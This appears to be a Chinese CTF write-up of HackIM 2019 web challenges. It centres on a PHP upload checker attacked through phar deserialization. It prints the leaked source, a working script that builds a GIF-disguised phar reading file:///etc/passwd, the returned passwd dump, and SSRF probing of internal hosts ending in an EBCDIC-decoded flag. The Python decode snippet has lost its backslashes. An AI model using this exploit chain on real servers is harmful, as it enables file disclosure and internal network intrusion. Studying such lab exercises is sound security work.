hackim web

escape

rfv

查看响应信息发现字段X-Powered-By，其对应的为express
可知为后端为nodejs

mime checkr

只能上传.jpeg格式图片，有一个类型检查的功能
这里有很重要的一点，一个getmime.bak的备份源码文件（不看writeup我是肯定不知道的，orz）

<?php
//error_reporting(-1);
//ini_set('display_errors', 'On');

class CurlClass{
public function httpGet($url) {
$ch = curl_init();  

curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
//  curl_setopt($ch,CURLOPT_HEADER, false); 

$output=curl_exec($ch);

curl_close($ch);
return $output;
 }
}


class MainClass {

    public function __destruct() {
$this->why =new CurlClass;
echo $this->url;
echo $this->why->httpGet($this->url);
    }
}


// Check if image file is a actual image or fake image
if(isset($_POST["submit"])) {
$check = getimagesize($_POST['name']);
if($check !== false) {
echo "File is an image - " . $check["mime"] . ".";
$uploadOk = 1;
} else {
echo "File is not an image.";
$uploadOk = 0;
}
}


?>

看到MainClass中的__destruct()，就明白要反序列化了，由此想到phar协议的利用

<?php

class CurlClass
{
public function httpGet($url)
{
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
//  curl_setopt($ch,CURLOPT_HEADER, false); 

$output = curl_exec($ch);

curl_close($ch);
return $output;
}
}


class MainClass
{

public function __destruct()
{
$this->why = new CurlClass;
echo $this->url;
echo $this->why->httpGet($this->url);
}
}

$phar = new Phar("zedd.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("GIF89a" . "<?php __HALT_COMPILER(); ?>"); //设置stub
$o = new MainClass();
$o->url = "file:///etc/passwd";
$phar->setMetadata($o); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); 
//签名自动计算
$phar->stopBuffering();
?>

生成一个phar文件，将后缀改为.jpeg,上传，然后phar://uploads/<name.jpeg>/test.txt,成功返回

HTTP/1.1 200 OK
Date: Sun, 31 Mar 2019 10:20:41 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.27
Vary: Accept-Encoding
Content-Length: 1003
Connection: close
Content-Type: text/html

File is not an image.

file:///etc/passwdroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false

尝试访问/etc/hosts，发现了一个172.21.0.2的地址，于是访问，发现无回显，然后再探测172.21.0.3主机，返回了信息：

http://172.21.0.3b'\xc8\x85\x93\x93\x96@a\x86\x85\xa3\x83\x88\xa1l\xad\xbd_|]M@@\x94\x85‘

一个神奇的编码，EBCDIC_1047，这个我真没见过
利用python的EBCDIC库进行解码

import ebcdic
blob=b'xc8x85x93x93x96@ax86x85xa3x83x88xa1lxadxbd_|]M@@x94x85'
print(blob.decode("cp1047"))

由于我电脑的问题，所以字符集显示的不正常，解码的正常值是

Hello /fetch~%[]^@)( me

于是再构造http://172.21.0.3/fetch~%[]^@)(,再次得到一个类似的编码，将其解密，则得到flag